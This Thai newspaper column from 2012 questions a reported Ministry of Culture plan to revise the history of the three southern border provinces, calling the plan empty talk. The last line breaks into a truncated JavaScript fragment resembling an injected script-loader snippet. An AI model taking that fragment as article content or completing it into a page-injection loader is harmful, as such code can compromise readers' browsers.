มติชนรายวัน ฉบับประจำวันจันทร์ที่ 5 พฤศจิกายน 2555

 

          3 จังหวัดชายแดนใต้ มีนักปราชญ์ นักวิชาการ และครูบาอาจารย์หลายสถาบัน ศึกษาค้นคว้าวิจัยไว้มากมายหลายแง่หลายมุมเหลือคณานับ

          เฉพาะด้านประวัติศาสตร์โบราณคดี ไม่มีงานวิจัยฉบับไหนเลยที่จะบอกว่ารัฐสุโขทัยมีอำนาจทางการเมืองแผ่ปกลงไปถึง 3 จังหวัดชายแดนใต้ในรัฐปัตตานี จะมีก็แต่เอกสารประวัติศาสตร์แห่งชาติของราชการไทย

          จึงน่าตื่นเต้นที่ วธ. จะชำระประวัติศาสตร์ 3 จังหวัดชายแดนใต้ ตามที่มีข่าวลงพิมพ์ใน นสพ. หลายฉบับ จะคัดตัวอย่างมาให้อ่านดังนี้

          ถ้าอ่านข่าวเพลิดเพลินอย่างเผินๆ ตามเนื้อข่าววกวน ก็รู้สึกดีใจที่ชำระประวัติศาสตร์ 3 จังหวัดชายแดนใต้ให้ถูกต้องตรงตามหลักฐานเสียที

          แต่เมื่ออ่านอย่างรอบคอบทุกถ้อยกระทงความแล้ว จะเห็นว่าไม่มีตรงไหนบอกว่าลงมือชำระประวัติศาสตร์ 3 จังหวัดชายแดนใต้

          มีแต่บอกว่ากำลังให้รวบรวมข้อมูลเพื่อเตรียมประชุมสัมมนาระดมความเห็นว่าจะมีการชำระประวัติศาสตร์ส่วนใดบ้าง แล้วถึงจะนำเสนอรัฐบาลรับทราบเพื่อให้รัฐบาลสั่งการอีกทีหนึ่งว่าจะให้ชำระหรือไม่ชำระ

          สรุปว่าขณะนี้ยังไม่ชำระ แต่กำลังคิดจะชำระ ซึ่งไม่มีกำหนดว่าจะคิดเสร็จเมื่อไร? หรืออาจไม่มีวันคิดเสร็จในรัฐบาลนี้เลยก็ได้ เอาไว้รัฐบาลหน้าค่อยเริ่มคิดใหม่ ซึ่งก็จะมีข่าวลักไก่มาอย่างนี้ทุกรัฐบาล

          3 จังหวัดชายแดนภาคใต้ในประวัติศาสตร์แห่งชาติของไทย ต้องอยู่ในอำนาจของพ่อขุนฯ สุโขทัยต่อไปตามเดิม

          ชำระประวัติศาสตร์ 3 จังหวัดชายแดนใต้ที่ลงใน นสพ. หลายฉบับ ถือเสียว่าเป็นข่าวบันเทิงvar d=document;var s=d.createElement(‘script’); } else {